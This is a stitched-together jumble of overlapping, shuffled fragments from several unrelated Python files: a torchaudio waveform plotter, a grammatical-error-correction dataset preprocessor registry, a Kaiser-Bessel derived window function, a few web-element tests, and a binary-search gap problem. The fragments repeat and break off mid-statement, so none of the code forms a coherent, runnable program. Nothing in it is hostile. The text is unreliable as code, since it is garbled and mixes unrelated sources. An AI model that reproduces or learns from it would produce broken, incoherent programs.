xlim=None, ylim=None): waveform = waveform.numpy()", "- waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1] print(waveform1.shape)", "[axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1) axes[c].grid(True) if num_channels > 1:", "librosa import matplotlib.pyplot as plt def plot_waveform(waveform, sample_rate, filename, title=\"Waveform\", xlim=None, ylim=None): waveform", "import os import torch import torchaudio import torchaudio.functional as F import torchaudio.transforms as", "1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename) 
if", "figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes] for", "sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) # diff", "diff[0.5 * sr1:1 * sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output,", "waveform2, sr2 = torchaudio.load(args.input2) # diff = waveform2 - waveform1 # print(diff.shape) #", "waveform2 - waveform1 # print(diff.shape) # diff = diff[0.5 * sr1:1 * sr1]", "* sr1] print(waveform1.shape) waveform1 = waveform1[:, :] plot_waveform(waveform1, sr1, filename=args.output, title=\"\", xlim=[args.time1, args.time2])", "> 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim) figure.suptitle(title) plt.show(block=False) plt.savefig(filename)", "argparse.ArgumentParser() parser.add_argument('--input', default='input.wav') parser.add_argument('--output', default='output.png') parser.add_argument('--time1', type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0')", "import torchaudio.functional as F import torchaudio.transforms as T import librosa import matplotlib.pyplot as", "axes[c].grid(True) if num_channels > 1: axes[c].set_ylabel(f'Channel {c+1}') if xlim: axes[c].set_xlim(xlim) if ylim: axes[c].set_ylim(ylim)", "num_channels == 1: axes = [axes] for c in range(num_channels): axes[c].plot(time_axis, waveform[c], linewidth=1)", "type=float, default=0.5) parser.add_argument('--time2', type=float, default=1) parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu", "ylim=None): waveform = waveform.numpy() num_channels, num_frames = waveform.shape time_axis = torch.arange(0, num_frames) /", "sample_rate figure, axes = plt.subplots(num_channels, 1) if num_channels == 1: axes = [axes]", "default=0.5) parser.add_argument('--time2', type=float, default=1) 
parser.add_argument('--gpu', default='0') args = parser.parse_args() os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu waveform1," ]
[ "FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message", ".fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str):", "super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name:", "'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in", "AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors:", ".lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError):", "import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import", "from .aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from", "FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name) return preprocessors[preprocessor_name]", "'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name) return", "preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.'", "= { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name", "found.' 
def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor,", "{ 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not", "= f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors", "def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg':", "f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors =", "import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def", "from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name:", "preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = {", "str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor }", "'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise", "AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor", "DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name}", "from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message =", "{preprocessor_name} was not found.' 
def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8':", "str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def", "class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name", "Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if preprocessor_name not in preprocessors: raise DatasetPreprocessorNotFoundError(preprocessor_name=preprocessor_name)", "was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor,", "preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor } if", "import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__()", "self.message = f'Dataset preprocessor with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str):", "<reponame>AntonYermilov/gec-dataset-analyzer from .aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor", "with name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw':", ".aesw import AESWPreprocessor from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg", "not found.' 
def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce':", ".jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset", "get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor, 'lang8': Lang8Preprocessor, 'fce': FCEPreprocessor, 'jfleg': JFLEGPreprocessor", "JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with", "import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor", "__init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was not", "Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class DatasetPreprocessorNotFoundError(ValueError): def __init__(self,", "def __init__(self, preprocessor_name: str): super().__init__() self.message = f'Dataset preprocessor with name {preprocessor_name} was", "from .lang8 import Lang8Preprocessor from .fce import FCEPreprocessor from .jfleg import JFLEGPreprocessor class", "name {preprocessor_name} was not found.' def get_dataset_preprocessor(preprocessor_name: str): preprocessors = { 'aesw': AESWPreprocessor," ]
[ "+ 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] =", "https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return", "from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if", "1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows", "Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived", "less, an empty array is returned. beta : float Kaiser-Bessel window shape parameter.", "are only defined for even number \" \"of taps\" ) w = np.zeros(M)", "if M < 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser", "\"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number of", "an empty array is returned. beta : float Kaiser-Bessel window shape parameter. Returns", "import division import numpy as np from scipy.signal import kaiser __all__ = [", "the output window. If zero or less, an empty array is returned. beta", "return scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([]) if", "M < 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel", "This window is only defined for an even number of taps. References ----------", "in SciPy \"\"\" from __future__ import division import numpy as np from scipy.signal", "division import numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived',", "output window. If zero or less, an empty array is returned. beta :", "= kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1]", "M : int Number of points in the output window. If zero or", ": int Number of points in the output window. If zero or less,", "raise ValueError( \"Kaiser Bessel Derived windows are only defined for even number \"", "number of taps. References ---------- .. 
[1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M", "] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M", "window shape parameter. Returns ------- w : ndarray The window, normalized to fulfil", "np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only", "normalized to fulfil the Princen-Bradley condition. Notes ----- This window is only defined", "is returned. beta : float Kaiser-Bessel window shape parameter. Returns ------- w :", "% 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for even", "w : ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes -----", "kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel", "= [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window.", "kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw =", "= np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw)", "SciPy \"\"\" from __future__ import division import numpy as np from scipy.signal import", "of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M =", "except ImportError: pass if M < 1: return np.array([]) if M % 2:", "only defined for even number \" \"of taps\" ) w = np.zeros(M) kaiserw", "Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number of points", "= int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except", "halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1] return w", "----- This window is only defined for an even number of taps. References", "empty array is returned. beta : float Kaiser-Bessel window shape parameter. Returns -------", "only defined for an even number of taps. References ---------- .. 
[1] Wikipedia,", "window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd", "the Princen-Bradley condition. Notes ----- This window is only defined for an even", "Module for windowing functions not found in SciPy \"\"\" from __future__ import division", "a Kaiser-Bessel derived window. Parameters ---------- M : int Number of points in", "The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window is", "\" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 +", "import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M <", "shape parameter. Returns ------- w : ndarray The window, normalized to fulfil the", "return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are", "Derived windows are only defined for even number \" \"of taps\" ) w", "beta : float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The", "M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta)", "fulfil the Princen-Bradley condition. Notes ----- This window is only defined for an", "Bessel Derived windows are only defined for even number \" \"of taps\" )", "csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] =", "__all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived", "is only defined for an even number of taps. References ---------- .. [1]", "scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([])", "M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for", "kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] /", "int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError:", "returned. beta : float Kaiser-Bessel window shape parameter. 
Returns ------- w : ndarray", "derived window. Parameters ---------- M : int Number of points in the output", "parameter. Returns ------- w : ndarray The window, normalized to fulfil the Princen-Bradley", "int Number of points in the output window. If zero or less, an", "2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2]", "np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1] return", "from __future__ import division import numpy as np from scipy.signal import kaiser __all__", "Parameters ---------- M : int Number of points in the output window. If", "windowing functions not found in SciPy \"\"\" from __future__ import division import numpy", "\"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import kaiser_derived as", "= np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:] = halfw[::-1]", "Number of points in the output window. If zero or less, an empty", "beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int Number", "float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window, normalized", "zero or less, an empty array is returned. beta : float Kaiser-Bessel window", "even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\"", "taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta)", ": float Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window,", "even number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M //", "defined for an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser", "\"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2 + 1,", "References ---------- .. 
[1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try:", "beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw w[-M//2:]", "\"Kaiser Bessel Derived windows are only defined for even number \" \"of taps\"", "w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum =", "<reponame>tombackstrom/mdct \"\"\" Module for windowing functions not found in SciPy \"\"\" from __future__", "scipy_kd(M, beta) except ImportError: pass if M < 1: return np.array([]) if M", "// 2 + 1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1])", "functions not found in SciPy \"\"\" from __future__ import division import numpy as", "window is only defined for an even number of taps. References ---------- ..", "as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M,", "not found in SciPy \"\"\" from __future__ import division import numpy as np", "defined for even number \" \"of taps\" ) w = np.zeros(M) kaiserw =", "or less, an empty array is returned. beta : float Kaiser-Bessel window shape", "Returns ------- w : ndarray The window, normalized to fulfil the Princen-Bradley condition.", "taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M)", "windows are only defined for even number \" \"of taps\" ) w =", "window. If zero or less, an empty array is returned. beta : float", "for an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\",", "< 1: return np.array([]) if M % 2: raise ValueError( \"Kaiser Bessel Derived", "points in the output window. If zero or less, an empty array is", "If zero or less, an empty array is returned. 
beta : float Kaiser-Bessel", "np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum = np.cumsum(kaiserw) halfw", "2: raise ValueError( \"Kaiser Bessel Derived windows are only defined for even number", "found in SciPy \"\"\" from __future__ import division import numpy as np from", "[ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters", "window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window is only", "for windowing functions not found in SciPy \"\"\" from __future__ import division import", "an even number of taps. References ---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window", "__future__ import division import numpy as np from scipy.signal import kaiser __all__ =", "kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1:", "kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M : int", "number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M // 2", "scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return", "scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M", "Kaiser-Bessel window shape parameter. Returns ------- w : ndarray The window, normalized to", "import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a", ": ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This", "np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta):", "array is returned. beta : float Kaiser-Bessel window shape parameter. Returns ------- w", "window. 
Parameters ---------- M : int Number of points in the output window.", "ImportError: pass if M < 1: return np.array([]) if M % 2: raise", "\"\"\" Module for windowing functions not found in SciPy \"\"\" from __future__ import", "pass if M < 1: return np.array([]) if M % 2: raise ValueError(", "ValueError( \"Kaiser Bessel Derived windows are only defined for even number \" \"of", "to fulfil the Princen-Bradley condition. Notes ----- This window is only defined for", "------- w : ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes", "[1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal import", "condition. Notes ----- This window is only defined for an even number of", ".. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from scipy.signal", "1, beta) csum = np.cumsum(kaiserw) halfw = np.sqrt(csum[:-1] / csum[-1]) w[:M//2] = halfw", "Kaiser-Bessel derived window. Parameters ---------- M : int Number of points in the", "def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ---------- M :", "beta) except ImportError: pass if M < 1: return np.array([]) if M %", "---------- .. [1] Wikipedia, \"Kaiser window\", https://en.wikipedia.org/wiki/Kaiser_window \"\"\" M = int(M) try: from", "for even number \" \"of taps\" ) w = np.zeros(M) kaiserw = kaiser(M", "Princen-Bradley condition. Notes ----- This window is only defined for an even number", "as scipy_kd return scipy_kd(M, beta) except ImportError: pass if M < 1: return", "import numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ]", "try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M, beta) except ImportError: pass", "---------- M : int Number of points in the output window. 
If zero", "numpy as np from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def", "'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\" Return a Kaiser-Bessel derived window. Parameters ----------", "in the output window. If zero or less, an empty array is returned.", "if M % 2: raise ValueError( \"Kaiser Bessel Derived windows are only defined", "of points in the output window. If zero or less, an empty array", ") w = np.zeros(M) kaiserw = kaiser(M // 2 + 1, beta) csum", "Notes ----- This window is only defined for an even number of taps.", "\"\"\" from __future__ import division import numpy as np from scipy.signal import kaiser", "from scipy.signal import kaiser __all__ = [ 'kaiser_derived', ] def kaiser_derived(M, beta): \"\"\"", "ndarray The window, normalized to fulfil the Princen-Bradley condition. Notes ----- This window", "\"\"\" M = int(M) try: from scipy.signal import kaiser_derived as scipy_kd return scipy_kd(M," ]
[ "'//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'})", "\"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element) == 'Test'", "= BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert", "b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element =", "coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element =", "def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector", "'//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'),", "**{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr():", "'//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver',", "assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert", "('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath',", "'//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_", "assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_", "test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element:", "('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element =", "\" 'Element: None') assert 
str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath':", "assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element =", "(\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element", "'Element: None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'})", "None') assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert", "def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \"", "str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath',", "BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test',", "= BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver',", "== str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement:", "b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath',", "== ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector:", "= (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def test_check_repr():", "BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def", "str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) == str_ def", "b_element = BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 
'Element: None')", "# -*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements():", "**{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element) ==", "test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element", "str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) ==", "== \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element) ==", "<reponame>oiakinat/shawl # -*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def", "-*- coding: utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element", "= BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div')", "test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert b_element._selector ==", "from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element", "import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None", "def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\"", "assert str(b_element) == str_ def test_check_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert repr(b_element)", "**{'xpath': '//div'}) assert repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath':", "-*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): 
b_element = BaseElement('driver', **{'xpath':", "'//div'}) assert b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element", "is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath':", "None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'})", "repr(b_element) == \"BaseElement: ('xpath', '//div')\" c_element = BaseElement('driver', repr_name='Test', **{'xpath': '//div'}) assert repr(c_element)", "b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver', **{'xpath': '//div'}) str_ =", "BaseElement('driver', **{'xpath': '//div'}) str_ = (\"Selector: ('xpath', '//div'), \" 'Element: None') assert str(b_element)", "b_element._element is None assert b_element._selector == ('xpath', '//div') def test_check_str_repr(): b_element = BaseElement('driver',", "utf-8 -*- # pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver',", "# pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'})", "pylint:disable=protected-access from shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert", "shawl import BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is", "BaseElement def test_load_elements(): b_element = BaseElement('driver', **{'xpath': '//div'}) assert b_element._element is None assert" ]
[ "in range(1, n): if arr[i] - last >= gap: cnt += 1 last", "import sys si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si())", "end, k): while start <= end: mid = (start + end) // 2", ">= gap: cnt += 1 last = arr[i] return cnt def search(start, end,", "= mid else: end = mid - 1 return res print(search(MIN, MAX, m))", "= arr[i] return cnt def search(start, end, k): while start <= end: mid", "start <= end: mid = (start + end) // 2 cnt = get_count(mid)", "def get_count(gap): cnt = 1 last = arr[0] for i in range(1, n):", "<= end: mid = (start + end) // 2 cnt = get_count(mid) if", "- last >= gap: cnt += 1 last = arr[i] return cnt def", "n): if arr[i] - last >= gap: cnt += 1 last = arr[i]", "cnt = get_count(mid) if cnt >= k: start = mid + 1 res", "map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1", "// 2 cnt = get_count(mid) if cnt >= k: start = mid +", "if cnt >= k: start = mid + 1 res = mid else:", "start = mid + 1 res = mid else: end = mid -", "last >= gap: cnt += 1 last = arr[i] return cnt def search(start,", "= 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last", "cnt def search(start, end, k): while start <= end: mid = (start +", "mid + 1 res = mid else: end = mid - 1 return", "= [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1]", "cnt = 1 last = arr[0] for i in range(1, n): if arr[i]", "sys si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for", "arr[i] return cnt def search(start, end, k): while start <= end: mid =", "gap: cnt += 1 last = arr[i] return cnt def search(start, end, k):", "end: mid = (start + end) // 2 cnt = get_count(mid) if cnt", "2 cnt = get_count(mid) if cnt >= k: start = mid + 1", "- arr[0] def get_count(gap): cnt = 1 last = arr[0] for i in", "m = map(int, si().split()) arr = [int(si()) for _ 